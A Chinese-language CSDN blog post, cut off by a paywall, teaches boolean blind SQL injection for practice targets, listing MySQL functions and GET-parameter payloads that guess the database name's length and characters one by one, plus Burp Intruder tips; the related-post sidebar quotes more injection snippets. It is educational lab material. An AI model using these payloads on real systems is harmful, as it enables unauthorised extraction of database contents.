布尔盲注练习

最新推荐文章于 2022-11-18 19:50:41 发布
VIP文章 最新推荐文章于 2022-11-18 19:50:41 发布
阅读量234 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60777183/article/details/119950864
版权

盲注需要掌握的几个函数:

1.length() 判断字符串的长度

举例:and length(database())>1

2.substr() 截取字符串的函数

格式:substr(str,pos,len)
substr(字符串内容,从哪里切,切多长)
可用于:and substr(database(),1,1)=’a’ 来判断数据库的第一位是否为a

3.ascii() 返回字符的asc码

加入ascii码判断,可改为:
?id=1 and ascii(substr(database(),1,1))>97

4.sleep() 将函数挂起一段时间

举例:slepp(n) n为n秒

5.if(expr1,expr2,expr3) 判断语句

如果第一个语句正确就执行第二个语句,错误就执行第三个语句。

布尔盲注(一)

1.判断库名长度。

题目url处get传参设置:
?id=1 and length(database())>1
?id=1 and length(database())>2
手动注入的话用二分法,用burp的话设置长度跑就行。

最后得出长度大于11,但不大于12,长度为12

2.判断库名

题目url处get传参设置:
?id=1 and ascii(substr(database(),1,1))>1
?id=1 and ascii(substr(database(),1,1))>2
一直递加到
?id=1 and ascii(substr(database(),1,1))>127
由此判断出第一个字母是多少。

同理判断第二个字母则用
?id=1 and ascii(substr(database(),2,1))>1
?id=1 and ascii(substr(database(),2,1))>2
一直递加到
?id=1 and ascii(substr(database(),2,1))>127

再次判断第三个字母……一直到第12个字母

可以用burp设置number1和number2来跑包,在Instruder.Posi

最低0.47元/天 解锁文章
回声777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
BUUCTF之[CISCN2019 华北赛区 Day2 Web1]Hack World ------- Boolean盲注
weixin_44632787的博客
10-05 358
第一眼看这题的时候还以为是堆叠查询,结果试了下发现并不是。然后试着试着发现这题其实是个bool盲注题。然后再写个Python脚本暴力破解就可以了(其实解题思路并不是自己想出来的,只是这题之前做过很多次了。所以现在再做的时候有印象) 这题没什么难的,主要知识点就是bool盲注。还有就是空格需要用括号()来绕过 先说一下网上找来的别的大佬的Payload # -*- coding:utf-8 -*- import requests import string def blind_injection(url).
字符串截取
qq_42129143的博客
05-22 241
1、slice() 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数和第一个参数的差, 如果参数是负数,则将该值加上字符串长度转为正值,如果第一个参数大于第二个参数,返回空字符串2、substring 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数与第一个参数的差 如果参数是负数,则将该值转换...
sql注入练习之bool盲注
windStudyer的专栏
05-22 1108
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入点
SQL注入学习记录一
一只菜鸡
02-22 707
前置知识: 1.mysql数据库的一些基本使用:增删改查 2.python脚本的使用 3.了解php中常见的与mysql相关的函数和类 0x01:数据库基础 1.基础操作 查看库名: mysql> show databases; 创建库: mysql> creat database test; 删除库: mysql> drop database test; 使用库: mysql> user test 创建表: mysql> create table test( -> `i
mysql数据库sql注入各种函数必须知道的知识
weixin_44286136的博客
05-20 511
数据库名:database() 数据库版本: version() 数据库用户: user() 操作系统: @@version_compile_os 系统用户名: system_user() 当前用户名: current_user 连接数据库的用户名:session_user() 读取数据库路径:@@datadir MYSQL安装路径:@@basedir 储存所有表名信息的表 : information_schema.tables 表名 : table_name 数据库名: table_schema 列名 :
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注的python脚本,其中语句需要根据环境条件做改变
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
WEB安全原理(1)——SQL注入
yuluotianjin的博客
09-01 564
1.Union注入 如果通过sql注入,页面上能获取预期信息,则可使用Union注入。 (1)判断是否存在注入点(区分下是数字型注入还是字符型注入) id=1 # 正常回值 id=1' # 异常回值 id=1 and 1=1 # 正常回值 id=1 and 1=2 # 异常回值 (2)判断表中的字段数 id=1 order by [1,2,3,……] 使用order by语句,后面跟随具体数字,这些数字可用于指代表中字段名,观察数字从1开始递增到哪个数字为止,界面回值均会正常,则那个终止的数字则为字段
SQL注入盲注基础
m0_62177883的博客
07-26 1704
如下,就取出了username下的全部数据内容这里,可以在2的位置写上username,3的位置写上password,就可以的到全部数据?指在SQL注入的过程中,找到注入点后,执行SQL语句后,选择的数据或者错误信息不能回显到前端页面。这里需要利用一些方法进行判断或者猜测,这个过程称之为盲注。第八关就用到盲注的方法。因为当输入?id=1时,出现的是只有两种显示,输入正确的语句,就显示youarein......,输入错误的东西,就不显示内容。.....................
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
WebGoat SQL盲注 解题思路
Abracadabra的专栏
09-20 4637
WebGoat SQL盲注 解题思路 ★ 题目:SQL Injection (advanced) 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4 题目要求最终以Tom的身份登录到系统中。 LOGIN界面: REGISTER界面: ★ 什么是SQL盲注? 这是我自己的理解,不一定准确...
墨者SQL注入漏洞测试(布尔盲注)题解
zr1213159840的博客
12-11 458
题目明说是布尔盲注,所以直接通过if函数进行注入即可 先猜测下数据库的长度 id=1 and 1=if(lenfth(database())=10,1,2) 能看出来,数据库的长度是10, 接着猜数据库的名称,直接添加substr截取一位一位猜,最后猜出来数据库的名称是stromgroup id=1 and 1=if(substr(database(),1,1)=‘s’,1,2) 接着猜库中包含的表有哪些,这个真的是手动搞了一个小时 id=1 and 1=if(substr((select table_n
sql server 从左侧截取不固定长度_sql盲注布尔注入
weixin_39890289的博客
12-09 183
sql盲注:从执行结果上无法从页面上看到之行结果无法分析sql执行过程,甚至无法得知是否运行盲注相对复杂一.在安全级别为LOW基于布尔盲注-注入点及类型判断1.php代码分析先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,之后再数据库中查询数据,将结果输出给result,将结果集中行的数量,如果大于0,输出User ID存在数据库中,否则发送数据包头并输出不存在数...
盲注
weixin_53026460的博客
10-24 2944
盲注属于SQL注入的一种,SQL注入可以通过不同的类别来分类,比如按照传参方式分类SQL注入:GET、POST、HEAD(COOKIE),根据做法的不同,我们也可以把这些分类为盲注、报错注入和显错注入;盲注是什么?(一)布尔盲注布尔是一种类型,核心是在于判断正确与否。布尔就是指这个页面有回显,但是不会显示具体内容,只会显示语句是否正常执行;举个例子,这是一条存在sql注入的语句;在这里输入and 1=1;会发现页面显示有数据;将and 1=1修改为and 1=1;
【Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1663
python实现sqli-labs第15关post盲注的二分法注入脚本(基于布尔盲注
sql注入详细过程
qq_42890862的博客
06-30 5816
mysql mysql5.0以上版本包含内置的information_schema数据库,它储存着mysql所有的数据库和表结构信息,利用该数据库可以查询到所有的数据库和表的内容 5.0 暴力破解的方式获取数据 1.原理 当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2.sql手工注入的基本思路 (1)找到注入点 在我们可控的输入部分加一些符号,查看页
布尔盲注 python
最新发布
12-22
布尔盲注是一种常见的网络安全攻击技术,利用用户输入的漏洞来修改数据库查询,从而实现非法访问或者窃取敏感信息。而 Python 是一种强大的编程语言,广泛应用于网络开发领域。 在 Python 中,由于开发者处理用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值